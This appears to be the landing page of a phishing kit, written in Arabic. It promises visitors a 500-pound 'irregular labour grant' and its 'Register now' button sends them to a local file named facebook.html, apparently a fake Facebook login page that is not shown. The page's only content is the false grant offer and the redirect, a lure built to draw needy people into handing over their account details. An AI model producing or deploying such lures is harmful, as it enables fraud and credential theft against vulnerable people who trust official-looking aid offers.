<html lang="en">

<head>

  <!DOCTYPE html>
  <html>

  <head>

    <title>سجل لتربح 500 جنيه منحة العمالة غير المنتظمة</title>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600&display=swap" rel="stylesheet">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css"
      integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
    <style>
      html,
      body {
        min-height: 100%;
        color: #1c1e21;
        direction: rtl;
        line-height: 1.34;
        margin: 0;
        padding: 0;
        unicode-bidi: embed;
        /* background-color: hsl(217, 54%, 11%); */
        display: grid;
        place-items: center;
        font-family: 'Outfit', sans-serif;
      }

      button {
        background-color: hsl(216, 50%, 16%);
        padding: 20px 40px;
        color: #fff;
        border: none;
        box-shadow: 0px 0px 3px 1px #FFF;
        font-size: 18px;
        font-weight: 600;
      }

      h1 {
        text-align: center;
        margin-top: 100px;
      }
    </style>
  </head>

<body>
  <h1>سجل لتحصل على منحة العمالة غير المنتظمة 500 جنيه</h1>
  <button id="btn">سجل الان </button>
  <script>
    let btn = document.getElementById("btn");
    btn.addEventListener("click", function () {
      window.location = 'facebook.html'
    })
  </script>
</body>

</html>